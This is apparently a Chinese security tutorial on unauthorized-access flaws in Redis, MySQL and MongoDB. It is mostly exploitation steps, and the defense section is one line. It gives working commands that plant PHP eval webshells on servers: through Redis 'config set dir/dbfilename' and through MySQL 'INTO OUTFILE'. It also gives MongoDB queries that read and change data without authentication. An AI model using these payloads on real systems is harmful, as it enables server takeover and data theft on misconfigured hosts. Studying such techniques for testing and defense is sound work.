7、未授权访问漏洞_未授权访问漏洞是高危吗

1、概述

服务或应用未授权或者鉴权失效导致被恶意攻击，广义上来讲，鉴权绕过也属于未授权访问。

• 分类：Web通用漏洞
• 风险等级及危害：
  1. 严重：可完全控制服务器、执行系统命令。
  2. 高危：可获取数据库大量敏感信息或对系统进行控制。
  3. 低危：可登录系统，但无法通过当前权限的操作造成实际危害。

有以下几种：

1. Redis未授权访问漏洞
2. Mysql未授权访问漏洞
3. MongoDB未授权访问漏洞
4. 。。。

2、漏洞利用

2.1、Redis未授权访问漏洞

开放端口：6379

利用方法：写文件Getshell、获取数据

config get dir #查看redis数据库路径
config set dir /root/redis-2.8.17# #修改靶机Redis数据库路径
config set dbfilename shell.php #生成shell.php文件
set xxx "\r\n\r\n<?php phpinfo();?>\r\n\r\n"#将一句话木马写入文件中
#"\r\n\r\n"是换行的意思，用redis写入文件会自带一些版本信息，如果不换行可能导致无法执行。
set xxx "\r\n\r\n<?php eval($_POST[whoami]);?>\r\n\r\n"#上传木马可以通过蚁剑连接
save
1
2
3
4
5
6
7

2.2、Mysql未授权访问漏洞

开放端口：3306

利用方法：爆破弱口令、写文件、远程连接获取数据

select'<?php @eval($_POST[1])?>'into outfile '/data/www/1.php'
1

2.3、MongoDB未授权访问漏洞

开放端口：27017

利用方法：远程连接获取数据

Show dbs //查询所有数据库
Use websec //选择数据库，没有就创建
db.websec.insert({"name":"websec is ez"}) //插入数据
db.websec.find().pretty() //查询所有数据
1
2
3
4

3、漏洞挖掘

对这几个常用端口进行测试

4、漏洞防御

开启身份验证